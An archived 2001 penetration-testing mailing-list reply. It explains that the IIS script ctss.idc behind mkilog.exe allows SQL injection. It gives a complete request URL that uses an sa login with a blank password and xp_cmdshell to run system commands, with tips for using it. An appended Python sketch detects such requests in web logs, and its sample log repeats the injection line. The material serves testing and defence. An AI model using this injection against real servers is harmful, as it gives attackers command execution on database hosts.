Penetration Testing mailing list archives

Re: Information about /scripts/toos/mkilog.exe


From: H D Moore <hdm () secureaustin com>
Date: Tue, 31 Jul 2001 12:50:23 -0500

mkilog.exe simply posts data to ctss.idc, which creates a table based on the 
parameters it gets:

[ctss.idc]
Datasource: %ds%
Username: %user%
Password: %pwd%
Template: ct.htx
SQLStatement:
+create table %table% (
+ClientHost varchar(50), username varchar(50),
+LogTime datetime, service varchar( 20), machine varchar( 20),
+serverip varchar( 50), processingtime int, bytesrecvd int,
+bytessent int, servicestatus int, win32status int,
+operation varchar( 200), target varchar(200), parameters text )

If you pass a correct DataSource, User, and Password (LocalServer, sa, blank 
password for locally installed servers), then change the table to:

bogustable(bleh int); EXEC master..xp_cmdshell("cmd.exe /c echo 0wned");--

You can use it to run system commands.  In this case, the actual query you 
would send is (lines probably wrapped):

/scripts/tools/ctss.idc?ds=LocalServer&user=sa&pwd=&table=bogustable(bleh 
int);EXEC+master..xp_cmdshell("cmd.exe+/c echo+0wned");--

For every query you run you have to create another garbage table, so remember 
to clean up all those bogus tables when you are done.

For some reason SQL Server 6.5 limits your command parameter to 30 characters 
when executed this way (which is _really_ annoying); I haven't been able to 
track down why yet.  Good luck!

-HD

http://www.digitaloffense.net (play)
http://www.digitaldefense.net (work)


On Tuesday 31 July 2001 06:48 am, César González wrote:
Hello all,

I am doing a penetration test, and some vulnerability scanners alert
about the script mkilog.exe. More exactly, Nessus said the following:

    The CGI /scripts/tools/mkilog.exe is present.

    This CGI allows an attacker to view and modify SQL database
    contents.

No SecurityFocus links, CVE advisory, etc. I have searched the most popular
security search engines but nothing appears. Any help will be appreciated.

----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
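
A detection sketch for the requests described in this thread, added here as an example and not part of the original post or of any tool it mentions: it scans web server log lines for requests to ctss.idc and mkilog.exe and flags a table parameter that is anything other than a bare identifier. The log field order, the sample lines and the function names are assumptions constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample log. Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = '''\
2001-07-31 12:40:01 192.0.2.10 GET /scripts/tools/ctss.idc ds=WebLog&user=logger&pwd=x&table=iislog 200
2001-07-31 12:41:17 198.51.100.7 GET /scripts/tools/ctss.idc ds=LocalServer&user=sa&pwd=&table=bogustable(bleh+int);EXEC+master..xp_cmdshell("cmd.exe+/c+echo+0wned");-- 200
2001-07-31 12:42:00 198.51.100.7 GET /Scripts/Tools/mkilog.exe - 200
2001-07-31 12:43:00 192.0.2.10 GET /default.htm - 200
'''

WATCHED = {"/scripts/tools/ctss.idc", "/scripts/tools/mkilog.exe"}
# A legitimate value for "create table %table%" is a bare identifier.
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]*")
# Tokens showing the value carries more than a table name.
TOKENS = re.compile(r"--|;|\(|\bexec\b|xp_cmdshell", re.I)

def parse_query(query):
    """Decode a query string into {lowercased name: [values]}, splitting on '&' only."""
    params = {}
    for pair in ([] if query == "-" else query.split("&")):
        name, _, value = pair.partition("=")
        params.setdefault(unquote_plus(name).lower(), []).append(unquote_plus(value))
    return params

def classify(stem, query):
    """Return (severity, reasons) for a watched script, or None for other paths."""
    if stem.lower() not in WATCHED:
        return None
    params = parse_query(query)
    reasons = []
    for table in params.get("table", []):
        if not IDENT.fullmatch(table):
            found = sorted({m.group(0).lower() for m in TOKENS.finditer(table)})
            reasons.append("table is not a bare identifier: " + " ".join(found))
    if [u.lower() for u in params.get("user", [])] == ["sa"] and params.get("pwd") == [""]:
        reasons.append("sa login with blank password")
    return ("high", reasons) if reasons else ("review", ["watched script requested"])

def scan(log_text):
    """Return [(client_ip, severity, reasons)] for requests to the watched scripts."""
    findings = []
    for line in log_text.splitlines():
        fields = line.split(" ")
        verdict = classify(fields[4], fields[5]) if len(fields) == 7 else None
        if verdict:
            findings.append((fields[2], *verdict))
    return findings
```

Calling `scan(SAMPLE_LOG)` returns three findings: two "review" hits for plain requests to the watched scripts and one "high" hit for the request whose table value contains statement separators and the sa login with a blank password.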

